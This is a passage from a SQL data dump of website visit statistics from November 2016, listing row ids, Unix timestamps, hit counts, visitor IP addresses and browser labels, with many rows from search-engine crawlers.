78133637,1,1,0,0,'78.111.189.149','chrome'),(72564,1478134025,1,1,0,0,'66.102.9.57','other'),(72565,1478134777,1,1,0,0,'163.172.65.216','other'),(72566,1478135461,1,1,0,0,'130.193.50.34','other'),(72567,1478136332,1,1,0,0,'66.102.9.61','other'),(72568,1478136671,1,1,0,0,'207.46.13.188','other'),(72569,1478139390,1,0,1,0,'66.249.75.183',''),(72570,1478139493,1,1,0,0,'141.8.142.58','other'),(72571,1478139538,1,1,0,0,'46.73.253.17','msie'),(72572,1478139920,1,0,1,0,'66.249.75.187',''),(72573,1478141051,1,0,1,0,'66.249.75.183',''),(72574,1478141742,3,0,3,0,'66.249.75.179',''),(72575,1478141912,1,1,0,0,'66.102.9.57','other'),(72576,1478143668,1,1,0,0,'163.172.65.116','other'),(72577,1478144089,1,1,0,0,'5.255.253.10','other'),(72578,1478144662,1,1,0,0,'163.172.64.192','other'),(72579,1478145182,1,1,0,0,'163.172.65.250','other'),(72580,1478145544,1,1,0,0,'163.172.64.235','other'),(72581,1478145804,1,1,0,0,'91.196.178.37','chrome'),(72582,1478145848,1,1,0,0,'163.172.65.68','other'),(72583,1478146620,1,1,0,0,'163.172.64.233','other'),(72584,1478147324,1,1,0,0,'163.172.65.32','other'),(72585,1478148181,1,0,1,0,'66.249.75.183',''),(72586,1478148758,2,1,1,0,'66.249.75.179',''),(72587,1478148788,1,0,1,0,'68.180.229.190',''),(72588,1478148967,1,1,0,0,'141.8.142.58','other'),(72589,1478148970,2,0,2,0,'66.249.75.187',''),(72590,1478149678,3,3,0,0,'51.254.97.219','other'),(72591,1478149954,2,0,2,0,'66.249.75.187',''),(72592,1478150376,1,0,1,0,'66.249.75.183',''),(72593,1478150655,1,1,0,0,'207.46.13.169','other'),(72594,1478150933,1,0,1,0,'66.249.75.187',''),(72595,1478151556,1,0,1,0,'66.249.69.152',''),(72596,1478152337,1,1,0,0,'207.46.13.89','other'),(72597,1478154823,1,1,0,0,'66.102.9.57','other'),(72598,1478154863,1,1,0,0,'91.196.178.70','firefox'),(72599,1478155165,1,1,0,0,'157.55.39.41','other'),(72600,1478155627,1,1,0,0,'207.46.13.169','other'),(72601,1478156236,1,1,0,0,'66.249.93.13','chrome'),(72602,1478157508,1,1,0,0,'157.55.39.41','other'),(72603,1478157632,1,1,0,0,'66.102.9.61','other'),(72604,1478157674,1,1,0,0,'163.172.65.128','other'),(72605,1478157826,1,1,0,0,'163.172.66.72','other'),(72606,1478158106,1,1,0,0,'207.46.13.169','other'),(72607,1478158162,1,1,0,0,'91.196.178.68','chrome'),(72608,1478158184,1,1,0,0,'91.196.178.135','chrome'),(72609,1478158889,1,1,0,0,'195.68.216.88','chrome'),(72610,1478158925,1,1,0,0,'188.32.21.174','msie'),(72611,1478159354,1,1,0,0,'163.172.66.22','other'),(72612,1478159706,1,1,0,0,'163.172.65.12','other'),(72613,1478159818,1,1,0,0,'94.178.23.229','chrome'),(72614,1478160639,1,0,1,0,'66.249.75.183',''),(72615,1478161518,1,1,0,0,'66.102.9.59','other'),(72616,1478163266,1,0,1,0,'66.249.75.179',''),(72617,1478163806,1,1,0,0,'37.55.59.1','chrome'),(72618,1478164765,1,0,1,0,'68.180.230.220',''),(72619,1478164937,1,1,0,0,'66.249.75.183','chrome'),(72620,1478164978,1,1,0,0,'130.193.50.34','other'),(72621,1478165176,1,1,0,0,'66.249.69.152','chrome'),(72622,1478165741,1,1,0,0,'82.207.91.234','firefox'),(72623,1478166367,1,1,0,0,'93.74.45.255','other'),(72624,1478166614,1,0,1,0,'66.249.75.183',''),(72625,1478166662,1,1,0,0,'195.69.222.18','chrome'),(72626,1478166677,1,1,0,0,'130.180.220.23','chrome'),(72627,1478166699,1,0,1,0,'66.249.75.187',''),(72628,1478167031,1,1,0,0,'91.196.178.70','firefox'),(72629,1478167452,1,0,1,0,'66.249.75.179',''),(72630,1478167776,1,1,0,0,'130.180.217.52','firefox'),(72631,1478168681,1,1,0,0,'66.102.9.57','other'),(72632,1478169020,1,1,0,0,'195.69.222.18','chrome'),(72633,1478169825,1,0,1,0,'66.249.69.155',''),(72634,1478170045,1,0,1,0,'66.249.75.183',''),(72635,1478170134,1,1,0,0,'163.172.66.181','other'),(72636,1478170278,1,0,1,0,'66.249.75.187',''),(72637,1478170788,1,1,0,0,'163.172.65.5','other'),(72638,1478170956,2,2,0,0,'157.55.39.105','other'),(72639,1478171168,1,1,0,0,'77.90.193.98','chrome'),(72640,1478171590,1,1,0,0,'195.10.210.49','chrome'),(72641,1478172128,1,1,0,0,'91.196.178.71','firefox'),(72642,1478172223,1,1,0,0,'66.102.9.61','other'),(72643,1478172615,1,1,0,0,'91.196.178.161','chrome'),(72644,1478172626,1,1,0,0,'163.172.66.129','other'),(72645,1478174345,1,0,1,0,'66.249.75.183',''),(72646,1478174377,1,1,0,0,'207.46.13.169','other'),(72647,1478174459,1,1,0,0,'163.172.64.230','other'),(72648,1478175558,1,1,0,0,'163.172.65.190','other'),(72649,1478175686,1,1,0,0,'163.172.65.228','other'),(72650,1478175701,1,1,0,0,'66.102.9.59','other'),(72651,1478176460,1,1,0,0,'180.76.15.14','other'),(72652,1478176771,1,1,0,0,'37.54.150.36','chrome'),(72653,1478177275,1,1,0,0,'46.200.102.79','chrome'),(72654,1478178036,1,0,1,0,'66.249.75.187',''),(72655,1478178125,1,0,1,0,'66.249.75.179',''),(72656,1478178674,1,1,0,0,'163.172.65.182','other'),(72657,1478178853,1,1,0,0,'37.204.201.153','chrome'),(72658,1478179295,1,0,1,0,'66.249.75.179',''),(72659,1478181889,1,1,0,0,'66.102.9.61','other'),(72660,1478181951,1,1,0,0,'91.196.178.165','firefox'),(72661,1478182139,1,1,0,0,'212.111.198.100','chrome'),(72662,1478182170,1,1,0,0,'163.172.66.184','other'),(72663,1478182234,1,1,0,0,'93.74.254.225','chrome'),(72664,1478182414,1,1,0,0,'163.172.65.125','other'),(72665,1478182434,1,1,0,0,'163.172.66.90','other'),(72666,1478182605,1,1,0,0,'163.172.66.5','other'),(72667,1478182837,1,1,0,0,'91.196.178.68','firefox'),(72668,1478183023,2,0,2,0,'66.249.75.179',''),(72669,1478183251,1,0,1,0,'66.249.75.183',''),(72670,1478183593,1,1,0,0,'91.244.18.22','opera'),(72671,1478183955,1,1,0,0,'91.196.177.46','firefox'),(72672,1478184127,1,1,0,0,'163.172.65.46','other'),(72673,1478184421,2,0,2,0,'66.249.75.183',''),(72674,1478184529,1,1,0,0,'130.193.50.34','other'),(72675,1478184714,1,0,1,0,'66.249.69.155',''),(72676,1478186119,1,1,0,0,'178.92.89.205','firefox'),(72677,1478187809,1,0,1,0,'66.249.75.187',''),(72678,1478187967,1,1,0,0,'163.172.65.66','other'),(72679,1478188519,1,1,0,0,'163.172.66.82','other'),(72680,1478188790,1,0,1,0,'66.249.75.183',''),(72681,1478189793,1,0,1,0,'66.249.75.187',''),(72682,1478189865,1,1,0,0,'163.172.65.205','other'),(72683,1478190665,1,1,0,0,'163.172.66.139','other'),(72684,1478190963,1,1,0,0,'163.172.64.217','other'),(72685,1478191242,1,1,0,0,'178.54.168.235','chrome'),(72686,1478191272,1,1,0,0,'93.158.152.9','other'),(72687,1478191535,1,1,0,0,'130.193.51.74','other'),(72688,1478191787,1,1,0,0,'93.74.166.136','other'),(72689,1478191800,1,1,0,0,'66.102.9.57','chrome'),(72690,1478192636,1,1,0,0,'82.145.221.60','other'),(72691,1478194036,3,3,0,0,'130.193.50.34','other'),(72692,1478194040,1,1,0,0,'163.172.66.81','other'),(72693,1478194250,1,0,1,0,'66.249.75.183',''),(72694,1478194440,1,1,0,0,'46.211.66.39','chrome'),(72695,1478195213,1,1,0,0,'66.102.9.57','other'),(72696,1478195304,1,1,0,0,'207.46.13.169','other'),(72697,1478195681,1,1,0,0,'95.133.238.243','chrome'),(72698,1478197264,1,1,0,0,'66.102.9.61','other'),(72699,1478197490,1,1,0,0,'163.172.65.37','other'),(72700,1478197882,1,1,0,0,'94.179.209.79','firefox'),(72701,1478198573,1,0,1,0,'66.249.75.183',''),(72702,1478198641,1,0,1,0,'66.249.75.187',''),(72703,1478199534,1,0,1,0,'68.180.230.220',''),(72704,1478200076,2,2,0,0,'130.180.220.157','chrome'),(72705,1478200608,1,1,0,0,'207.46.13.169','other'),(72706,1478200618,1,1,0,0,'141.8.183.25','other'),(72707,1478200883,2,0,2,0,'66.249.75.183',''),(72708,1478200998,1,1,0,0,'91.196.178.104','chrome'),(72709,1478201023,1,1,0,0,'66.102.9.61','other'),(72710,1478201591,1,0,1,0,'66.249.69.152',''),(72711,1478201876,1,1,0,0,'157.55.39.105','other'),(72712,1478202432,1,1,0,0,'130.193.50.34','other'),(72713,1478204979,1,1,0,0,'66.102.9.61','other'),(72714,1478205368,1,1,0,0,'91.206.4.38','firefox'),(72715,1478206261,1,1,0,0,'157.55.39.41','other'),(72716,1478206598,1,1,0,0,'194.187.216.46','chrome'),(72717,1478206616,1,1,0,0,'130.193.51.19','other'),(72718,1478207199,2,0,2,0,'66.249.75.183',''),(72719,1478207364,1,1,0,0,'141.8.183.25','other'),(72720,1478208733,1,1,0,0,'130.193.50.34','other'),(72721,1478209449,1,1,0,0,'217.69.133.231','other'),(72722,1478210779,1,1,0,0,'130.193.50.34','other'),(72723,1478211024,1,0,1,0,'66.249.75.187',''),(72724,1478212484,1,1,0,0,'130.193.50.34','other'),(72725,1478212936,1,0,1,0,'66.249.75.187',''),(72726,1478212937,1,0,1,0,'66.249.75.179',''),(72727,1478215624,1,1,0,0,'163.172.65.19','other'),(72728,1478215848,1,1,0,0,'93.158.152.61','other'),(72729,1478216026,1,0,1,0,'66.249.69.149',''),(72730,1478216037,1,1,0,0,'66.249.75.179','chrome'),(72731,1478216121,1,1,0,0,'163.172.65.132','other'),(72732,1478216559,1,1,0,0,'163.172.65.46','other'),(72733,1478216726,2,2,0,0,'130.193.50.34','other'),(72734,1478217440,1,1,0,0,'163.172.65.38','other'),(72735,1478217878,1,1,0,0,'130.193.50.34','other'),(72736,1478218085,1,0,1,0,'66.249.75.179',''),(72737,1478218308,1,0,1,0,'66.249.75.183',''),(72738,1478220232,1,0,1,0,'66.249.75.179',''),(72739,1478220720,1,0,1,0,'66.249.75.187',''),(72740,1478221001,1,1,0,0,'207.46.13.85','other'),(72741,1478221117,1,1,0,0,'180.76.15.137','other'),(72742,1478221354,2,2,0,0,'195.154.243.59','chrome'),(72743,1478221379,1,1,0,0,'130.193.50.34','other'),(72744,1478224152,1,1,0,0,'163.172.65.66','other'),(72745,1478224323,1,1,0,0,'163.172.65.193','other'),(72746,1478224340,1,1,0,0,'163.172.65.244','other'),(72747,1478224447,1,1,0,0,'163.172.65.182','other'),(72748,1478225093,1,1,0,0,'163.172.64.226','other'),(72749,1478225234,1,1,0,0,'157.55.39.105','other'),(72750,1478225344,1,1,0,0,'66.102.9.61','other'),(72751,1478225459,1,0,1,0,'66.249.75.179',''),(72752,1478225598,1,1,0,0,'130.193.50.34','other'),(72753,1478225640,1,1,0,0,'46.242.79.221','msie'),(72754,1478226609,1,1,0,0,'5.255.253.10','other'),(72755,1478226724,1,0,1,0,'66.249.75.183',''),(72756,1478228087,1,0,1,0,'66.249.75.187',''),(72757,1478228535,1,1,0,0,'130.193.50.34','other'),(72758,1478229863,1,1,0,0,'66.102.9.57','other'),(72759,1478229904,1,0,1,0,'66.249.75.183',''),(72760,1478230026,1,1,0,0,'93.158.152.61','other'),(72761,1478231304,1,0,1,0,'66.249.75.179',''),(72762,1478231630,1,0,1,0,'68.180.230.220',''),(72763,1478232196,1,1,0,0,'130.193.51.19','other'),(72764,1478233048,1,0,1,0,'66.249.75.179',''),(72765,1478233099,1,1,0,0,'163.172.64.223','other'),(72766,1478233284,1,1,0,0,'163.172.64.233','other'),(72767,1478233486,1,1,0,0,'141.8.183.25','other'),(72768,1478233563,1,0,1,0,'66.249.69.155',''),(72769,1478233569,1,0,1,0,'68.180.229.190',''),(72770,1478233735,1,1,0,0,'174.129.237.157','other'),(72771,1478234093,1,1,0,0,'130.193.50.34','other'),(72772,1478234148,1,1,0,0,'163.172.65.121','other'),(72773,1478235315,1,1,0,0,'91.196.178.39','other'),(72774,1478235675,1,0,1,0,'66.249.75.179',''),(72775,1478235927,1,1,0,0,'66.102.9.57','other'),(72776,1478236298,2,0,2,0,'66.249.75.183',''),(72777,1478236421,169,169,0,0,'51.254.37.59','other'),(72778,1478237444,1,0,1,0,'66.249.75.179',''),(72779,1478237934,1,1,0,0,'157.55.39.105','other'),(72780,1478238807,2,0,2,0,'66.249.75.183',''),(72781,1478239187,1,0,1,0,'66.249.75.187',''),(72782,1478240003,1,1,0,0,'66.102.9.59','other'),(72783,1478240082,1,1,0,0,'163.172.64.234','other'),(72784,1478240598,1,1,0,0,'91.196.178.70','firefox'),(72785,1478241735,1,1,0,0,'66.249.93.143','chrome'),(72786,1478243110,1,1,0,0,'91.196.178.70','firefox'),(72787,1478243565,1,1,0,0,'163.172.64.193','other'),(72788,1478243688,1,1,0,0,'163.172.65.30','other'),(72789,1478244109,1,1,0,0,'94.179.124.18','chrome'),(72790,1478244148,1,1,0,0,'66.102.9.57','other'),(72791,1478244490,1,1,0,0,'94.179.18.202','firefox'),(72792,1478244728,1,1,0,0,'94.179.80.107','firefox'),(72793,1478244814,1,1,0,0,'130.193.51.19','other'),(72794,1478245975,3,3,0,0,'91.196.178.70','firefox'),(72795,1478245996,1,1,0,0,'104.45.18.178','other'),(72796,1478246214,1,0,1,0,'66.249.69.149',''),(72797,1478246415,1,0,1,0,'66.249.75.179',''),(72798,1478247254,1,1,0,0,'141.8.183.19','other'),(72799,1478247751,1,1,0,0,'66.102.9.59','other'),(72800,1478248551,1,1,0,0,'163.172.66.21','other'),(72801,1478249510,1,1,0,0,'130.193.50.32','other'),(72802,1478250320,1,1,0,0,'91.196.178.68','firefox'),(72803,1478250546,2,2,0,0,'141.8.183.25','other'),(72804,1478250609,1,1,0,0,'91.196.178.70','firefox'),(72805,1478250761,1,0,1,0,'66.249.75.187',''),(72806,1478250790,1,1,0,0,'130.193.50.34','other'),(72807,1478250814,1,1,0,0,'5.255.253.47','other'),(72808,1478250981,1,0,1,0,'66.249.75.179',''),(72809,1478251063,1,1,0,0,'195.248.184.80','chrome'),(72810,1478251264,1,1,0,0,'66.102.9.61','other'),(72811,1478251481,2,1,1,0,'66.249.69.155',''),(72812,1478251692,1,1,0,0,'91.196.178.70','firefox'),(72813,1478252735,1,1,0,0,'163.172.65.17','other'),(72814,1478252841,1,1,0,0,'130.193.50.34','other'),(72815,1478253001,1,1,0,0,'91.196.178.136','chrome'),(72816,1478253506,1,1,0,0,'91.196.178.70','firefox'),(72817,1478254135,1,1,0,0,'178.93.42.169','chrome'),(72818,1478254803,1,1,0,0,'91.196.178.71','firefox'),(72819,1478255059,2,2,0,0,'157.55.39.105','other'),(72820,1478255250,1,1,0,0,'163.172.65.42','other'),(72821,1478255500,1,1,0,0,'94.179.42.234','chrome'),(72822,1478255512,1,1,0,0,'157.55.39.41','other'),(72823,1478256151,1,1,0,0,'130.193.50.34','other'),(72824,1478257254,1,1,0,0,'163.172.66.166','other'),(72825,1478257404,1,0,1,0,'66.249.75.187',''),(72826,1478257419,1,1,0,0,'163.172.65.245','other'),(72827,1478258590,1,1,0,0,'66.102.9.61','other'),(72828,1478259728,1,1,0,0,'90.137.188.53','chrome'),(72829,1478261481,1,1,0,0,'94.179.209.79','firefox'),(72830,1478261718,1,0,1,0,'66.249.75.183',''),(72831,1478263003,1,1,0,0,'91.196.178.168','firefox'),(72832,1478263335,1,1,0,0,'141.8.183.25','other'),(72833,1478263529,1,0,1,0,'66.249.75.187',''),(72834,1478263677,1,1,0,0,'130.193.50.34','other'),(72835,1478264324,1,1,0,0,'212.90.174.130','chrome'),(72836,1478264481,1,1,0,0,'157.55.39.41','other'),(72837,1478264636,1,1,0,0,'91.217.66.22','chrome'),(72838,1478265091,1,0,1,0,'66.249.75.187',''),(72839,1478265506,1,1,0,0,'95.133.238.183','chrome'),(72840,1478265614,1,1,0,0,'91.196.178.70','firefox'),(72841,1478265738,1,1,0,0,'91.217.66.22','chrome'),(72842,1478265988,1,1,0,0,'91.196.178.70','chrome'),(72843,1478266118,1,1,0,0,'91.196.178.68','firefox'),(72844,1478266632,1,1,0,0,'163.172.66.141','other'),(72845,1478266880,1,0,1,0,'66.249.75.179',''),(72846,1478266943,1,1,0,0,'94.179.209.79','firefox'),(72847,1478267859,1,1,0,0,'94.179.209.79','firefox'),(72848,1478267949,1,0,1,0,'66.249.75.179',''),(72849,1478267954,2,2,0,0,'195.68.202.226','chrome'),(72850,1478268198,1,1,0,0,'180.76.15.12','other'),(72851,1478268292,1,1,0,0,'163.172.65.243','other'),(72852,1478268412,1,1,0,0,'130.193.50.34','other'),(72853,1478268773,1,0,1,0,'66.249.75.187',''),(72854,1478268939,1,1,0,0,'163.172.65.19','other'),(72855,1478269038,1,0,1,0,'66.249.69.149',''),(72856,1478269177,1,1,0,0,'163.172.66.19','other'),(72857,1478270006,1,1,0,0,'94.179.72.64','chrome'),(72858,1478270077,1,1,0,0,'163.172.66.183','other'),(72859,1478270268,1,1,0,0,'212.113.42.98','chrome'),(72860,1478270913,1,1,0,0,'37.53.122.15','chrome'),(72861,1478271329,1,1,0,0,'207.46.13.169','other'),(72862,1478271950,1,0,1,0,'66.249.75.187',''),(72863,1478272390,2,2,0,0,'141.8.183.25','other'),(72864,1478273201,1,1,0,0,'91.196.178.133','chrome'),(72865,1478273264,1,1,0,0,'94.179.209.79','firefox'),(72866,1478273613,1,1,0,0,'163.172.66.23','other'),(72867,1478273658,1,1,0,0,'130.193.50.34','other'),(72868,1478274222,1,1,0,0,'163.172.65.122','other'),(72869,1478274602,1,1,0,0,'163.172.66.6','other'),(72870,1478275339,1,0,1,0,'66.249.75.183',''),(72871,1478276121,1,1,0,0,'94.179.209.79','firefox'),(72872,1478276366,1,1,0,0,'207.46.13.169','other'),(72873,1478276419,1,1,0,0,'163.172.66.59','other'),(72874,1478276431,1,1,0,0,'130.180.220.146','chrome'),(72875,1478276844,1,0,1,0,'66.249.75.179',''),(72876,1478276887,1,0,1,0,'66.249.75.183',''),(72877,1478277452,1,1,0,0,'207.46.13.85','other'),(72878,1478277459,1,1,0,0,'62.210.148.91','chrome'),(72879,1478277892,1,1,0,0,'178.137.87.242','firefox'),(72880,1478278491,1,1,0,0,'66.249.75.187','chrome'),(72881,1478279616,1,1,0,0,'163.172.65.42','other'),(72882,1478280233,2,2,0,0,'130.193.50.34','other'),(72883,1478280286,1,1,0,0,'66.102.9.29','other'),(72884,1478280571,1,0,1,0,'66.249.75.179',''),(72885,1478280643,2,2,0,0,'94.179.209.79','firefox'),(72886,1478280915,1,0,1,0,'66.249.75.183',''),(72887,1478281171,1,0,1,0,'66.249.69.149',''),(72888,1478281279,2,2,0,0,'130.193.50.34','other'),(72889,1478281354,1,0,1,0,'66.249.75.187',''),(72890,1478281621,1,1,0,0,'163.172.66.59','other'),(72891,1478281997,1,1,0,0,'163.172.66.168','other'),(72892,1478282210,1,1,0,0,'94.179.209.79','firefox'),(72893,1478282378,1,1,0,0,'163.172.65.127','other'),(72894,1478282425,3,3,0,0,'130.193.50.34','other'),(72895,1478282991,1,0,1,0,'66.249.75.183',''),(72896,1478283196,1,0,1,0,'66.249.75.179',''),(72897,1478283357,1,1,0,0,'130.193.50.34','other'),(72898,1478283667,1,1,0,0,'66.102.9.29','other'),(72899,1478284316,1,1,0,0,'91.196.178.66','firefox'),(72900,1478284956,1,1,0,0,'141.8.183.25','other'),(72901,1478285395,1,1,0,0,'94.179.209.79','firefox'),(72902,1478286238,1,1,0,0,'163.172.64.182','other'),(72903,1478286334,1,0,1,0,'66.249.75.179',''),(72904,1478287251,1,1,0,0,'66.102.9.27','other'),(72905,1478287571,1,1,0,0,'157.55.39.105','other'),(72906,1478288114,1,1,0,0,'163.172.66.35','other'),(72907,1478288139,1,1,0,0,'163.172.66.91','other'),(72908,1478288374,1,1,0,0,'91.196.178.40','chrome'),(72909,1478288633,1,1,0,0,'163.172.66.151','other'),(72910,1478288978,1,1,0,0,'141.8.183.25','other'),(72911,1478289105,1,1,0,0,'130.193.50.34','other'),(72912,1478289560,1,1,0,0,'95.158.63.136','chrome'),(72913,1478290174,1,1,0,0,'163.172.66.54','other'),(72914,1478290969,1,1,0,0,'66.102.9.25','other'),(72915,1478291605,1,1,0,0,'66.249.75.179','chrome'),(72916,1478291750,1,1,0,0,'66.102.9.27','chrome'),(72917,1478291779,1,1,0,0,'130.193.50.34','other'),(72918,1478291840,1,1,0,0,'91.196.178.168','other'),(72919,1478292750,1,1,0,0,'91.196.178.130','chrome'),(72920,1478292910,1,1,0,0,'163.172.66.29','other'),(72921,1478294215,1,1,0,0,'180.76.15.148','other'),(72922,1478294467,1,1,0,0,'66.102.9.29','other'),(72923,1478296107,2,2,0,0,'130.193.50.34','other'),(72924,1478296521,1,1,0,0,'163.172.65.225','other'),(72925,1478296722,1,1,0,0,'207.46.13.85','other'),(72926,1478296752,1,1,0,0,'163.172.66.116','other'),(72927,1478296846,1,1,0,0,'163.172.66.174','other'),(72928,1478297581,1,1,0,0,'163.172.66.8','other'),(72929,1478298143,1,1,0,0,'207.46.13.85','other'),(72930,1478298535,1,1,0,0,'66.102.9.29','other'),(72931,1478299442,1,1,0,0,'157.55.39.105','other'),(72932,1478299688,1,1,0,0,'163.172.65.63','other'),(72933,1478300159,1,1,0,0,'130.193.50.34','other'),(72934,1478300409,1,1,0,0,'163.172.65.185','other'),(72935,1478301277,1,1,0,0,'163.172.66.71','other'),(72936,1478301778,1,1,0,0,'130.193.50.34','other'),(72937,1478301803,1,1,0,0,'163.172.66.72','other'),(72938,1478302069,1,1,0,0,'163.172.64.235','other'),(72939,1478302100,1,1,0,0,'163.172.65.5','other'),(72940,1478302240,1,1,0,0,'163.172.66.175','other'),(72941,1478302522,1,1,0,0,'163.172.66.58','other'),(72942,1478303048,2,2,0,0,'130.193.50.34','other'),(72943,1478303882,1,1,0,0,'163.172.66.97','other'),(72944,1478304226,1,1,0,0,'141.8.183.25','other'),(72945,1478304827,1,1,0,0,'163.172.65.191','other'),(72946,1478304882,1,1,0,0,'163.172.66.137','other'),(72947,1478305115,1,1,0,0,'163.172.64.243','other'),(72948,1478305316,1,0,1,0,'66.249.75.187',''),(72949,1478305586,1,1,0,0,'157.55.39.41','other'),(72950,1478305615,1,1,0,0,'163.172.66.122','other'),(72951,1478305892,1,1,0,0,'130.193.51.19','other'),(72952,1478305984,1,1,0,0,'66.249.75.179','chrome'),(72953,1478305989,1,1,0,0,'163.172.66.78','other'),(72954,1478306296,1,1,0,0,'163.172.64.247','other'),(72955,1478306482,2,2,0,0,'130.193.50.34','other'),(72956,1478306748,1,1,0,0,'141.8.142.58','other'),(72957,1478306803,1,1,0,0,'130.193.51.19','other'),(72958,1478309978,1,1,0,0,'163.172.65.20','other'),(72959,1478310149,1,1,0,0,'82.145.221.149','other'),(72960,1478310364,1,1,0,0,'217.69.133.203','other'),(72961,1478311148,1,1,0,0,'141.8.183.25','other'),(72962,1478311541,1,1,0,0,'163.172.65.132','other'),(72963,1478312487,1,1,0,0,'163.172.65.239','other'),(72964,1478313282,1,1,0,0,'141.8.142.58','other'),(72965,1478313553,1,1,0,0,'163.172.65.30','other'),(72966,1478313640,1,1,0,0,'157.55.39.41','other'),(72967,1478313890,1,1,0,0,'163.172.66.90','other'),(72968,1478314000,1,1,0,0,'163.172.66.34','other'),(72969,1478314597,1,1,0,0,'163.172.66.155','other'),(72970,1478314676,1,1,0,0,'163.172.64.185','other'),(72971,1478314697,1,1,0,0,'130.193.50.34','other'),(72972,1478315030,1,1,0,0,'163.172.66.45','other'),(72973,1478315162,1,1,0,0,'163.172.65.107','other'),(72974,1478315756,1,1,0,0,'59.94.136.7','firefox'),(72975,1478315879,1,1,0,0,'176.195.138.94','msie'),(72976,1478316280,1,1,0,0,'157.55.39.41','other'),(72977,1478316506,1,1,0,0,'157.55.39.105','other'),(72978,1478316927,1,1,0,0,'66.102.9.27','other'),(72979,1478317769,1,1,0,0,'163.172.66.170','other'),(72980,1478317945,1,1,0,0,'207.46.13.85','other'),(72981,1478318887,1,1,0,0,'130.193.50.34','other'),(72982,1478318916,1,1,0,0,'82.145.222.255','other'),(72983,1478318928,1,1,0,0,'163.172.65.216','other'),(72984,1478319134,1,1,0,0,'163.172.66.143','other'),(72985,1478319387,1,1,0,0,'163.172.66.173','other'),(72986,1478319798,1,1,0,0,'163.172.66.133','other'),(72987,1478320063,2,1,1,0,'62.210.83.88',''),(72988,1478320415,1,1,0,0,'163.172.65.11','other'),(72989,1478321052,1,1,0,0,'141.8.183.25','other'),(72990,1478321574,1,1,0,0,'163.172.66.82','other'),(72991,1478322705,2,2,0,0,'130.193.50.34','other'),(72992,1478323346,1,1,0,0,'163.172.66.23','other'),(72993,1478323994,1,1,0,0,'66.102.9.29','other'),(72994,1478324586,1,1,0,0,'163.172.66.164','other'),(72995,1478324990,1,1,0,0,'91.196.178.167','chrome'),(72996,1478325507,1,0,1,0,'66.249.75.179',''),(72997,1478325546,1,1,0,0,'173.234.153.122','other'),(72998,1478326507,1,1,0,0,'163.172.66.18','other'),(72999,1478326685,1,1,0,0,'141.8.183.25','other'),(73000,1478327772,2,2,0,0,'95.213.141.126','opera'),(73001,1478327859,1,1,0,0,'163.172.66.70','other'),(73002,1478328418,1,1,0,0,'163.172.65.220','other'),(73003,1478328785,1,1,0,0,'163.172.66.73','other'),(73004,1478328898,1,1,0,0,'94.179.209.79','firefox'),(73005,1478329292,1,1,0,0,'130.193.50.34','other'),(73006,1478329460,1,1,0,0,'207.46.13.85','other'),(73007,1478329528,1,1,0,0,'163.172.65.115','other'),(73008,1478330452,1,0,1,0,'66.249.75.183',''),(73009,1478330918,14,14,0,0,'188.165.214.26','other'),(73010,1478331468,1,1,0,0,'163.172.66.143','other'),(73011,1478331739,1,1,0,0,'163.172.66.82','other'),(73012,1478331784,1,1,0,0,'163.172.65.190','other'),(73013,1478332574,1,1,0,0,'163.172.64.249','other'),(73014,1478333300,1,1,0,0,'176.195.116.158','msie'),(73015,1478333341,1,1,0,0,'163.172.66.152','other'),(73016,1478334038,1,1,0,0,'66.249.69.149','chrome'),(73017,1478334309,1,1,0,0,'66.102.9.29','other'),(73018,1478335353,1,1,0,0,'94.179.22.87','chrome'),(73019,1478336973,1,1,0,0,'40.77.167.65','other'),(73020,1478337139,1,1,0,0,'130.193.50.34','other'),(73021,1478337457,1,1,0,0,'66.102.9.29','chrome'),(73022,1478337725,1,1,0,0,'188.32.234.10','msie'),(73023,1478338377,1,1,0,0,'66.102.9.29','other'),(73024,1478340637,1,1,0,0,'213.179.252.18','chrome'),(73025,1478341173,1,1,0,0,'163.172.65.226','other'),(73026,1478341468,1,1,0,0,'163.172.66.151','other'),(73027,1478341472,1,1,0,0,'163.172.65.63','other'),(73028,1478341901,1,1,0,0,'163.172.64.179','other'),(73029,1478342003,1,1,0,0,'163.172.66.68','other'),(73030,1478342044,1,1,0,0,'66.102.9.27','other'),(73031,1478342663,1,1,0,0,'163.172.66.131','other'),(73032,1478342779,101,101,0,0,'64.79.85.205','other'),(73033,1478343068,1,1,0,0,'64.79.76.50','other'),(73034,1478344951,1,1,0,0,'66.102.9.29','other'),(73035,1478347251,1,1,0,0,'141.8.183.25','other'),(73036,1478348179,1,1,0,0,'163.172.65.208','other'),(73037,1478348186,1,1,0,0,'180.76.15.150','other'),(73038,1478348483,1,1,0,0,'163.172.65.68','other'),(73039,1478348508,1,1,0,0,'66.102.9.29','other'),(73040,1478348905,1,1,0,0,'130.193.50.34','other'),(73041,1478348980,1,0,1,0,'66.249.75.179',''),(73042,1478349612,1,1,0,0,'163.172.65.227','other'),(73043,1478349871,1,1,0,0,'163.172.66.14','other'),(73044,1478350016,1,1,0,0,'176.195.138.94','msie'),(73045,1478351034,1,1,0,0,'163.172.66.102','other'),(73046,1478351118,1,1,0,0,'163.172.64.223','other'),(73047,1478352322,1,1,0,0,'66.102.9.25','other'),(73048,1478352900,1,1,0,0,'66.249.75.179','chrome'),(73049,1478353251,1,1,0,0,'141.8.183.25','other'),(73050,1478353401,1,1,0,0,'163.172.66.65','other'),(73051,1478353586,1,1,0,0,'188.163.74.12','firefox'),(73052,1478354329,1,1,0,0,'163.172.65.110','other'),(73053,1478356455,1,1,0,0,'66.102.9.27','other'),(73054,1478356596,1,1,0,0,'163.172.65.228','other'),(73055,1478358094,1,1,0,0,'163.172.65.5','other'),(73056,1478358424,1,1,0,0,'95.134.202.33','chrome'),(73057,1478358446,2,2,0,0,'130.193.50.34','other'),(73058,1478358466,1,1,0,0,'95.158.63.136','chrome'),(73059,1478358608,1,1,0,0,'163.172.65.202','other'),(73060,1478359379,1,1,0,0,'94.179.209.79','firefox'),(73061,1478359410,1,1,0,0,'163.172.65.243','other'),(73062,1478359478,1,1,0,0,'66.102.9.27','other'),(73063,1478359789,1,1,0,0,'163.172.65.121','other'),(73064,1478361061,1,0,1,0,'68.180.230.220',''),(73065,1478361561,1,1,0,0,'163.172.65.28','other'),(73066,1478362896,1,1,0,0,'141.8.183.25','other'),(73067,1478363090,1,1,0,0,'66.102.9.27','other'),(73068,1478363597,1,1,0,0,'130.193.51.19','other'),(73069,1478365340,1,1,0,0,'91.196.178.164','chrome'),(73070,1478365578,1,1,0,0,'163.172.66.105','other'),(73071,1478365851,2,2,0,0,'130.193.51.19','other'),(73072,1478366170,1,1,0,0,'94.179.209.79','firefox'),(73073,1478366473,1,1,0,0,'180.76.15.145','other'),(73074,1478367150,1,1,0,0,'66.102.9.27','other'),(73075,1478368256,2,1,1,0,'62.210.83.88',''),(7307